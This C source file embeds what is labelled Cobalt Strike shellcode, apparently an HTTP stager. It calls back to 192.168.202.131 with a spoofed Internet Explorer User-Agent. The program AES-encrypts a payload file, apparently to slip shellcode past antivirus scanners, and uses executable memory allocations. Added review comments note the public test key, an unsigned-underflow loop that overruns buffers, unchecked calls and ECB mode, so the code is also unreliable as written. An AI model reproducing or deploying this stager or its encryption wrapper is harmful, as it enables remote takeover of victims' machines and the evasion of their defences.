#include <stdio.h>
#include <windows.h>
#include "WjCryptLib_Aes.h"
// AES-128 key, hard-coded and passed to AesInitialise() in main().
// NOTE(review): this is the published example key from FIPS-197 Appendix B /
// NIST SP 800-38A (2b7e1516...). Anything encrypted with it is recoverable by
// anyone who recognises the constant, so it provides no confidentiality; a
// scanner can use the same key to inspect the output file.
uint8_t Key128[16] = { 0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6, 0xab, 0xf7, 0x15, 0x88, 0x09, 0xcf, 0x4f, 0x3c };
//cs shellcode
unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x50\x00\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x4c\x44\x6b\x61\x00\x45\x1d\xc9\xc9\xef\x3d\xa5\x27\x9d\x96\xb1\xb5\xba\x38\x33\x8a\xf0\x6d\xe7\x2a\x6f\xdb\x6d\x1b\x9e\xa9\x55\xfc\xba\xd1\x96\xb9\x8f\xe1\x09\x27\xd5\x5c\x07\x55\x0a\x6b\xe7\xae\x80\xd3\xea\xed\x63\x92\xc9\x3e\x11\x52\x10\x95\x07\x9e\x32\xe0\x96\xce\xd4\x07\xa9\xe2\xc6\x75\x42\xdf\x6a\x57\xc7\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x29\x0d\x0a\x00\x66\
x00\x03\xae\xfe\x61\x87\x1b\x4f\x30\x18\x7f\xa2\xc5\x61\x12\x4a\x4e\xfa\x37\x94\x45\x47\x41\x07\x9b\xe0\x17\x91\x2d\x42\xe0\x44\x8d\x8f\x4e\xde\x34\xb8\x5f\xf7\xef\x9d\x63\xe4\x49\xc5\x1d\xf4\x1d\x68\x7a\x90\xc3\xea\xd2\x7e\x5f\x94\x4f\x66\xcb\xc0\xa3\x60\xa2\xc7\x56\x3a\xec\x58\x48\x47\x1c\x06\x65\xdc\x11\xbe\xf8\xed\x34\x6b\xb5\xd1\x31\x26\xcf\x37\xbe\xd3\x92\xe0\x45\x17\x18\x4e\x13\xaa\x8e\xbf\xe9\x66\x5a\x58\xf1\x43\xf5\xc3\xe9\x79\xdb\xd8\xe2\xfd\xa6\x72\x81\xce\x3c\x64\x00\x78\x23\x2f\x83\xf5\xe1\xdd\xec\x2a\xc6\x85\x8e\x6b\x20\x6d\xb0\x10\x4c\x0e\x0e\x0b\x1a\x1f\x92\x00\x26\x43\x69\x8a\xc7\xfb\x5a\xbe\x72\x91\x2a\x8b\x46\x48\x28\x29\x0a\x4d\x50\x8c\x38\xf7\xcb\x1a\xd2\xbf\x00\xad\xc0\xca\xb4\x2e\x98\x67\x01\x29\x85\x65\xbc\x2a\xe8\x04\xe1\xbf\x18\xbd\x0f\xf8\x92\x84\x2e\x26\x84\x89\x9f\x36\x11\x7e\x95\xa1\x1c\xe1\xfa\x35\xb3\x42\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x30\x32\x2e\x31\x33\x31\x00\x51\x09\xbf\x6d";
/*
 * Reads D:\11.bin, AES-128-encrypts it block by block with Key128 and writes
 * the result to D:\2_msg.bin. argc/argv and the global buf[] are not used;
 * both paths are fixed. Returns 0 on success, -1 on any reported failure.
 *
 * Review notes (defects visible in this function, not fixed here):
 *  - OPEN_ALWAYS creates an empty input file when the path is missing, so a
 *    missing input becomes a zero-length read rather than an error.
 *  - GetFileSize() is not checked for INVALID_FILE_SIZE, ReadFile() and
 *    WriteFile() return values are ignored, and neither handle is closed.
 *  - The encryption loop counts down dwSize (the file size), not dwRead, and
 *    subtracts 16 from an unsigned DWORD: if the size is not a multiple of 16
 *    it wraps instead of reaching 0, so the loop reads past lpAddress and
 *    writes past lpEncryptAddress. The rounded-up lpEncryptSize is computed
 *    from dwRead, so the two bounds can also disagree.
 *  - Both buffers are plain data but are mapped PAGE_EXECUTE_READWRITE; RWX
 *    memory is unnecessary here and is a common detection signal.
 *  - Each 16-byte block is encrypted independently with no IV or chaining,
 *    i.e. ECB mode — confirm against the WjCryptLib_Aes API.
 */
int main(int argc, char* argv[]) {
// Encrypt the shellcode stored in a file
HANDLE hFile = CreateFile("D:\\11.bin", GENERIC_READ, 0, NULL, OPEN_ALWAYS, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
printf("Error");
return -1;
}
DWORD dwSize;
// NOTE(review): INVALID_FILE_SIZE (0xFFFFFFFF) is not distinguished from a real size.
dwSize = GetFileSize(hFile, NULL);
// Input buffer; PAGE_EXECUTE_READWRITE is not needed for data that is only read.
LPVOID lpAddress = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (lpAddress == NULL)
{
printf("Error");
return -1;
}
RtlZeroMemory(lpAddress, dwSize);
// Read the contents
DWORD dwRead;
// NOTE(review): return value unchecked; dwRead may be smaller than dwSize.
ReadFile(hFile, lpAddress, dwSize, &dwRead, 0);
// Allocate a new buffer
// Output length rounded up to the next multiple of 16 (one AES block), based on dwRead.
DWORD lpEncryptSize = dwRead % 0x10 ? dwRead / 0x10 * 0x10 + 0x10 : dwRead / 0x10 * 0x10;
LPVOID lpEncryptAddress = VirtualAlloc(NULL, lpEncryptSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (lpEncryptAddress == NULL)
{
printf("Error");
return -1;
}
RtlZeroMemory(lpEncryptAddress, lpEncryptSize);
// Encrypt 16 bytes per iteration until the source data is exhausted
AesContext mAesContext;
AesInitialise(&mAesContext, Key128, AES_KEY_SIZE_128);
DWORD i = 0;
// NOTE(review): dwSize is unsigned; when it is not a multiple of 16 the
// subtraction below wraps past zero and the loop never terminates.
while (dwSize > 0)
{
AesEncrypt(&mAesContext, (uint8_t*)lpAddress +i*0x10, (uint8_t*)lpEncryptAddress+i*0x10);
dwSize -= 0x10;
i++;
}
/* Encrypt the CS shellcode from buf[] (disabled)
LPVOID lpBuff = VirtualAlloc(NULL, 801, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Encrypt 16 bytes per iteration until the source data is exhausted
AesContext mAesContext;
AesInitialise(&mAesContext, Key128, AES_KEY_SIZE_128);
DWORD i = 0;
DWORD dwSize = 800;
while (dwSize > 0)
{
AesEncrypt(&mAesContext, (uint8_t*)buf + i * 0x10, (uint8_t*)lpBuff + i * 0x10);
dwSize -= 0x10;
i++;
}
*/
// Save the new encrypted file
// NOTE(review): CREATE_NEW fails if the output already exists; the input handle is still open.
HANDLE hEncryptFile = CreateFile("D:\\2_msg.bin", GENERIC_ALL, 0, NULL, CREATE_NEW, 0, NULL);
if (hEncryptFile == INVALID_HANDLE_VALUE)
{
printf("Error");
return -1;
}
DWORD dwWriteEncryptData = 0;
//WriteFile(hEncryptFile, lpEncryptAddress, 800,&dwWriteEncryptData,NULL);
// NOTE(review): return value and dwWriteEncryptData are not checked; handle is never closed.
WriteFile(hEncryptFile, lpEncryptAddress, lpEncryptSize, &dwWriteEncryptData, NULL);
return 0;
}